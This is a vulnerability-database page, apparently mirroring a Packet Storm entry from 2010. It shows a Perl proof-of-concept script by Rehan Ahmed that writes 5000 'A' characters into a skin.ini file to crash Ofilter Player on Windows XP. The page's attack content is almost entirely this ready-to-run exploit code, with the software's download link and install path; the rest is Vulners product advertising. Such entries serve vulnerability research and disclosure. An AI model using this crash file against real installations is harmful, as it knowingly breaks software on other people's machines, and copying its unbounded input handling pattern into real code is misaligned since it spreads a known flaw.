Lucene search
K

Ofilter Player Crash

🗓️ 14 Jan 2010 00:00:00Reported by Rehan AhmedType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

Ofilter Player (skin.ini) Local Crash Po

Code
`#!/usr/bin/perl  
#Exploit Title: Ofilter Player (skin.ini) Local Crash PoC  
#Date:13/01/2010  
#Author:Vulnerability Discovered By Rehan Ahmed ([email protected])  
#Software Link:http://www.008soft.com/products/ofilter-player.htm  
#Tested On: WinXP SP2  
  
my $boom="\x41" x 5000;  
my $file="skin1.ini"; #C:\Program Files\OfilterPlayer\skin  
open($FILE,">$file");  
print $FILE $boom;  
close($FILE);  
print "File Successfully Created\n";  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation